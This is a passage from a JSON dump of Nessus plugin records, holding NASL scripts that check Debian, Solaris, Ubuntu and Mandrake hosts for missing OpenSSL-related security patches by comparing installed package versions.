SSH servers, and web\nservers.\n\nFor the stable distribution (sarge) these problems have been fixed in\nversion 0.9.6m-1sarge4.\n\nThis package exists only for compatibility with older software, and is\nnot present in the unstable or testing branches of Debian.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:openssl096\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/10/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/10/20\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/09/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.1\", prefix:\"libssl0.9.6\", reference:\"0.9.6m-1sarge4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:20:12", "description": "SunOS 5.9_x86: pkg utilities Patch.\nDate this patch was last updated by Sun : Apr/05/11", "cvss3": {"score": null, "vector": null}, "published": "2004-07-12T00:00:00", "type": "nessus", "title": "Solaris 9 (x86) : 114568-29", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4343", "CVE-2007-5135", "CVE-2011-0412"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS9_X86_114568.NASL", "href": "https://www.tenable.com/plugins/nessus/13606", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(13606);\n script_version(\"1.45\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2006-2937\", \"CVE-2006-2940\", \"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2007-5135\", \"CVE-2011-0412\");\n\n script_name(english:\"Solaris 9 (x86) : 114568-29\");\n script_summary(english:\"Check for patch 114568-29\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 114568-29\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"SunOS 5.9_x86: pkg utilities Patch.\nDate this patch was last updated by Sun : Apr/05/11\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/114568-29\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"You should install this patch for your system to be up-to-date.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.9_x86\", arch:\"i386\", patch:\"114568-29\", obsoleted_by:\"122715-03 \", package:\"SUNWhea\", version:\"11.9.0,REV=2002.11.04.02.51\") < 0) flag++;\nif (solaris_check_patch(release:\"5.9_x86\", arch:\"i386\", patch:\"114568-29\", obsoleted_by:\"122715-03 \", package:\"SUNWcsu\", version:\"11.9.0,REV=2002.11.04.02.51\") < 0) flag++;\nif (solaris_check_patch(release:\"5.9_x86\", arch:\"i386\", patch:\"114568-29\", obsoleted_by:\"122715-03 \", package:\"SUNWcsr\", version:\"11.9.0,REV=2002.11.04.02.51\") < 0) flag++;\nif (solaris_check_patch(release:\"5.9_x86\", arch:\"i386\", patch:\"114568-29\", obsoleted_by:\"122715-03 \", package:\"SUNWarc\", version:\"11.9.0,REV=2002.11.04.02.51\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:solaris_get_report());\n else security_hole(0);\n exit(0);\n}\naudit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:12:45", "description": "It was discovered that OpenSSL did not correctly perform Montgomery multiplications. Local attackers might be able to reconstruct RSA private keys by examining another user's OpenSSL processes.\n(CVE-2007-3108)\n\nMoritz Jodeit discovered that OpenSSL's SSL_get_shared_ciphers function did not correctly check the size of the buffer it was writing to. A remote attacker could exploit this to write one NULL byte past the end of an application's cipher list buffer, possibly leading to arbitrary code execution or a denial of service. (CVE-2007-5135).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2007-11-10T00:00:00", "type": "nessus", "title": "Ubuntu 6.06 LTS / 6.10 / 7.04 : openssl vulnerabilities (USN-522-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4343", "CVE-2007-3108", "CVE-2007-5135"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libssl-dev", "p-cpe:/a:canonical:ubuntu_linux:libssl0.9.8", "p-cpe:/a:canonical:ubuntu_linux:libssl0.9.8-dbg", "p-cpe:/a:canonical:ubuntu_linux:openssl", "cpe:/o:canonical:ubuntu_linux:6.06:-:lts", "cpe:/o:canonical:ubuntu_linux:6.10", "cpe:/o:canonical:ubuntu_linux:7.04"], "id": "UBUNTU_USN-522-1.NASL", "href": "https://www.tenable.com/plugins/nessus/28127", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-522-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(28127);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2006-2937\", \"CVE-2006-2940\", \"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2007-3108\", \"CVE-2007-5135\");\n script_xref(name:\"USN\", value:\"522-1\");\n\n script_name(english:\"Ubuntu 6.06 LTS / 6.10 / 7.04 : openssl vulnerabilities (USN-522-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that OpenSSL did not correctly perform Montgomery\nmultiplications. Local attackers might be able to reconstruct RSA\nprivate keys by examining another user's OpenSSL processes.\n(CVE-2007-3108)\n\nMoritz Jodeit discovered that OpenSSL's SSL_get_shared_ciphers\nfunction did not correctly check the size of the buffer it was writing\nto. A remote attacker could exploit this to write one NULL byte past\nthe end of an application's cipher list buffer, possibly leading to\narbitrary code execution or a denial of service. (CVE-2007-5135).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/522-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libssl-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libssl0.9.8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libssl0.9.8-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:7.04\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/09/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/11/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2007-2019 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(6\\.06|6\\.10|7\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 6.06 / 6.10 / 7.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libssl-dev\", pkgver:\"0.9.8a-7ubuntu0.4\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libssl0.9.8\", pkgver:\"0.9.8a-7ubuntu0.4\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libssl0.9.8-dbg\", pkgver:\"0.9.8a-7ubuntu0.4\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"openssl\", pkgver:\"0.9.8a-7ubuntu0.4\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"libssl-dev\", pkgver:\"0.9.8b-2ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"libssl0.9.8\", pkgver:\"0.9.8b-2ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"libssl0.9.8-dbg\", pkgver:\"0.9.8b-2ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"openssl\", pkgver:\"0.9.8b-2ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"libssl-dev\", pkgver:\"0.9.8c-4ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"libssl0.9.8\", pkgver:\"0.9.8c-4ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"libssl0.9.8-dbg\", pkgver:\"0.9.8c-4ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"openssl\", pkgver:\"0.9.8c-4ubuntu0.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libssl-dev / libssl0.9.8 / libssl0.9.8-dbg / openssl\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:19:59", "description": "SunOS 5.9: pkg utilities Patch.\nDate this patch was last updated by Sun : Apr/05/11", "cvss3": {"score": null, "vector": null}, "published": "2004-07-12T00:00:00", "type": "nessus", "title": "Solaris 9 (sparc) : 113713-30", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4343", "CVE-2007-5135", "CVE-2011-0412"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS9_113713.NASL", "href": "https://www.tenable.com/plugins/nessus/13543", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(13543);\n script_version(\"1.44\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2006-2937\", \"CVE-2006-2940\", \"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2007-5135\", \"CVE-2011-0412\");\n\n script_name(english:\"Solaris 9 (sparc) : 113713-30\");\n script_summary(english:\"Check for patch 113713-30\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 113713-30\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"SunOS 5.9: pkg utilities Patch.\nDate this patch was last updated by Sun : Apr/05/11\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/113713-30\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"You should install this patch for your system to be up-to-date.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"113713-30\", obsoleted_by:\"117123-10 \", package:\"SUNWhea\", version:\"11.9.0,REV=2002.04.06.15.27\") < 0) flag++;\nif (solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"113713-30\", obsoleted_by:\"117123-10 \", package:\"SUNWcsu\", version:\"11.9.0,REV=2002.04.06.15.27\") < 0) flag++;\nif (solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"113713-30\", obsoleted_by:\"117123-10 \", package:\"SUNWcsr\", version:\"11.9.0,REV=2002.04.06.15.27\") < 0) flag++;\nif (solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"113713-30\", obsoleted_by:\"117123-10 \", package:\"SUNWarc\", version:\"11.9.0,REV=2002.04.06.15.27\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:solaris_get_report());\n else security_hole(0);\n exit(0);\n}\naudit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:14:23", "description": "Openssl recently had several vulnerabilities which were patched (CVE-2006-2937,2940,3738,4339, 4343). Some versions of ntp are built against a static copy of the SSL libraries. As a precaution an updated copy built against the new libraries in being made available.", "cvss3": {"score": null, "vector": null}, "published": "2007-02-18T00:00:00", "type": "nessus", "title": "Mandrake Linux Security Advisory : ntp (MDKSA-2006:178)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4339", "CVE-2006-4343", "CVE-2006-5201", "CVE-2006-7140", "CVE-2007-5135"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:ntp", "p-cpe:/a:mandriva:linux:ntp-client", "cpe:/o:mandriva:linux:2006", "cpe:/o:mandriva:linux:2007"], "id": "MANDRAKE_MDKSA-2006-178.NASL", "href": "https://www.tenable.com/plugins/nessus/24564", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2006:178. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(24564);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2006-2937\", \"CVE-2006-2940\", \"CVE-2006-3738\", \"CVE-2006-4339\", \"CVE-2006-4343\", \"CVE-2006-5201\", \"CVE-2006-7140\", \"CVE-2007-5135\");\n script_bugtraq_id(19849, 20246, 20248, 20249);\n script_xref(name:\"MDKSA\", value:\"2006:178\");\n\n script_name(english:\"Mandrake Linux Security Advisory : ntp (MDKSA-2006:178)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Openssl recently had several vulnerabilities which were patched\n(CVE-2006-2937,2940,3738,4339, 4343). Some versions of ntp are built\nagainst a static copy of the SSL libraries. As a precaution an updated\ncopy built against the new libraries in being made available.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ntp and / or ntp-client packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(119, 189, 310, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:ntp-client\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2006\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2007\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/10/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/02/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2006.0\", reference:\"ntp-4.2.0-21.2.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"ntp-client-4.2.0-21.2.20060mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK2007.0\", reference:\"ntp-4.2.0-31.2mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", reference:\"ntp-client-4.2.0-31.2mdv2007.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:14:15", "description": "Openssl recently had several vulnerabilities which were patched (CVE-2006-2937,2940,3738,4339, 4343). Some MySQL versions are built against a static copy of the SSL libraries. As a precaution an updated copy built against the new libraries in being made available.", "cvss3": {"score": null, "vector": null}, "published": "2007-02-18T00:00:00", "type": "nessus", "title": "Mandrake Linux Security Advisory : MySQL (MDKSA-2006:177)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4339", "CVE-2006-4343", "CVE-2006-5201", "CVE-2006-7140", "CVE-2007-5135"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:MySQL", "p-cpe:/a:mandriva:linux:MySQL-Max", "p-cpe:/a:mandriva:linux:MySQL-NDB", "p-cpe:/a:mandriva:linux:MySQL-bench", "p-cpe:/a:mandriva:linux:MySQL-client", "p-cpe:/a:mandriva:linux:MySQL-common", "p-cpe:/a:mandriva:linux:lib64mysql14", "p-cpe:/a:mandriva:linux:lib64mysql14-devel", "p-cpe:/a:mandriva:linux:libmysql14", "p-cpe:/a:mandriva:linux:libmysql14-devel", "cpe:/o:mandriva:linux:2006"], "id": "MANDRAKE_MDKSA-2006-177.NASL", "href": "https://www.tenable.com/plugins/nessus/24563", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2006:177. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(24563);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2006-2937\", \"CVE-2006-2940\", \"CVE-2006-3738\", \"CVE-2006-4339\", \"CVE-2006-4343\", \"CVE-2006-5201\", \"CVE-2006-7140\", \"CVE-2007-5135\");\n script_bugtraq_id(19849, 20246, 20248, 20249);\n script_xref(name:\"MDKSA\", value:\"2006:177\");\n\n script_name(english:\"Mandrake Linux Security Advisory : MySQL (MDKSA-2006:177)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Openssl recently had several vulnerabilities which were patched\n(CVE-2006-2937,2940,3738,4339, 4343). Some MySQL versions are built\nagainst a static copy of the SSL libraries. As a precaution an updated\ncopy built against the new libraries in being made available.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(119, 189, 310, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:MySQL\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:MySQL-Max\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:MySQL-NDB\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:MySQL-bench\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:MySQL-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:MySQL-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64mysql14\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64mysql14-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libmysql14\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libmysql14-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2006\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/10/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/02/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2006.0\", reference:\"MySQL-4.1.12-4.10.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"MySQL-Max-4.1.12-4.10.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"MySQL-NDB-4.1.12-4.10.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"MySQL-bench-4.1.12-4.10.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"MySQL-client-4.1.12-4.10.20060mdk\", yank:\"mdk\")) flag++;\nif 